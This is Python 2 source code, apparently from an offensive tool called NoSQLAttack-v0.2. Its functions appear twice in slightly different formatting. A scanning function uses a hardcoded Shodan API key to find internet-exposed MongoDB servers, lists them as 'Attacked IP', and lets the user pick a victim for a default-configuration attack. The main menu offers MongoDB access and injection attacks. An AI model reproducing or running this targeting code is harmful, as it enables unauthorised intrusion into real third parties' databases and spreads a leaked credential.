def scanMongoDBIP():
SHODAN_API_KEY = "9kwHl4vdqoXjeKl7iXOHMvXGT3ny85Ig"
api = shodan.Shodan(SHODAN_API_KEY)
print 'Start Scanning.....'
try:
results = api.search('mongoDB')
# print 'Results found:%s' % results['total']
for index in range(1, 10):
print str(index) + '_Attacked IP : %s' % results['matches'][index][
'ip_str']
# select = raw_input("Get more IP (y/n)?")
select = raw_input("Select IP to attack:")
GlobalVar.set_victim(results['matches'][int(select)]['ip_str'])
GlobalVar.set_optionSet(0, True)
GlobalVar.set_myIP('127.0.0.1')
GlobalVar.set_optionSet(4, True)
start = raw_input("Start Default Configuration Attack(y/n)?")
if start == 'y':
netAttacks(GlobalVar.get_victim(), GlobalVar.get_dbPort(),
GlobalVar.get_myIP(), GlobalVar.get_myPort())
# for result in results['matches']:
# print 'Attacked IP: %s' % result['ip_str']
#print result['data']
#print 'hostnames:' % result['hostnames'];
#print ' '
except shodan.APIError, e:
print 'Error:%s' % e
def scanMongoDBIP():
SHODAN_API_KEY = "9kwHl4vdqoXjeKl7iXOHMvXGT3ny85Ig";
api = shodan.Shodan(SHODAN_API_KEY);
print 'Start Scanning.....'
try:
results = api.search('mongoDB')
# print 'Results found:%s' % results['total']
for index in range(1,10):
print str(index)+'_Attacked IP : %s' % results['matches'][index]['ip_str']
# select = raw_input("Get more IP (y/n)?")
select = raw_input("Select IP to attack:")
GlobalVar.set_victim(results['matches'][int(select)]['ip_str'])
GlobalVar.set_optionSet(0, True)
GlobalVar.set_myIP('127.0.0.1')
GlobalVar.set_optionSet(4, True)
start = raw_input("Start Default Configuration Attack(y/n)?")
if start == 'y':
netAttacks(GlobalVar.get_victim(), GlobalVar.get_dbPort(), GlobalVar.get_myIP(), GlobalVar.get_myPort())
# for result in results['matches']:
# print 'Attacked IP: %s' % result['ip_str']
#print result['data']
#print 'hostnames:' % result['hostnames'];
#print ' '
except shodan.APIError, e:
print 'Error:%s' % e
def mainMenu():
global platform
global victim
global dbPort
global myIP
global myPort
mmSelect = True
while mmSelect:
os.system('clear')
print "==============================================="
print " _ _ _____ _____ _ "
print " | \ | | / ___|| _ | | "
print " | \| | ___ \ `--. | | | | | "
print " | . ` |/ _ \ `--. \| | | | | "
print " | |\ | (_) /\__/ /\ \/' / |____ "
print " \_| \_/\___/\____/ \_/\_\_____/ "
print " _ "
print " /\ _ _ | | _ "
print " / \ _| |_ _| |_ _____ ___ | | / / "
print " / /\ \ |_ _||_ _| / __ \ / __| | |/ / "
print " / /--\ \ | | | |_ | |_| | ||__ | |\ \ "
print "/ / -- \ \ \___\ \___\ \______\ \___| | | \_\ "
print "=============================================== "
print "NoSQLAttack-v0.2"
print "*****@*****.**"
print "\n"
print "1-Scan attacked IP"
print "2-Configurate parameters"
print "3-MongoDB Access Attacks"
print "4-Injection Attacks"
# print "4-Scan for Anonymous " + platform + " Access"
# print "5-Change Platform (Current: " + platform + ")"
print "x-Exit"
select = raw_input("Select an option:")
if select == "1":
scanMongoDBIP()
if select == "2":
option.option()
elif select == "3":
if (GlobalVar.get_optionSet(0) == True
and GlobalVar.get_optionSet(4) == True):
if platform == "MongoDB":
netAttacks(GlobalVar.get_victim(), GlobalVar.get_dbPort(),
GlobalVar.get_myIP(), GlobalVar.get_myPort())
elif select == "4":
if (GlobalVar.get_optionSet(0)
== True) and (GlobalVar.get_optionSet(2) == True):
if GlobalVar.get_httpMethod() == "GET":
getApps()
elif select == "x":
sys.exit()
else:
raw_input("Invalid selection. Press enter to continue.")
def mainMenu():
global platform
global victim
global dbPort
global myIP
global myPort
mmSelect = True
while mmSelect:
os.system('clear')
print "==============================================="
print " _ _ _____ _____ _ "
print " | \ | | / ___|| _ | | "
print " | \| | ___ \ `--. | | | | | "
print " | . ` |/ _ \ `--. \| | | | | "
print " | |\ | (_) /\__/ /\ \/' / |____ "
print " \_| \_/\___/\____/ \_/\_\_____/ "
print " _ "
print " /\ _ _ | | _ "
print " / \ _| |_ _| |_ _____ ___ | | / / "
print " / /\ \ |_ _||_ _| / __ \ / __| | |/ / "
print " / /--\ \ | | | |_ | |_| | ||__ | |\ \ "
print "/ / -- \ \ \___\ \___\ \______\ \___| | | \_\ "
print "=============================================== "
print "NoSQLAttack-v0.2"
print "*****@*****.**"
print "\n"
print "1-Scan attacked IP"
print "2-Configurate parameters"
print "3-MongoDB Access Attacks"
print "4-Injection Attacks"
# print "4-Scan for Anonymous " + platform + " Access"
# print "5-Change Platform (Current: " + platform + ")"
print "x-Exit"
select = raw_input("Select an option:")
if select == "1":
scanMongoDBIP()
if select == "2":
option.option();
elif select == "3":
if(GlobalVar.get_optionSet(0) == True and GlobalVar.get_optionSet(4) == True):
if platform == "MongoDB":
netAttacks( GlobalVar.get_victim(),GlobalVar.get_dbPort(),GlobalVar.get_myIP(),GlobalVar.get_myPort())
elif select == "4":
if(GlobalVar.get_optionSet(0) == True) and (GlobalVar.get_optionSet(2) == True):
if GlobalVar.get_httpMethod() == "GET":
getApps()
elif select == "x":
sys.exit()
else:
raw_input("Invalid selection. Press enter to continue.")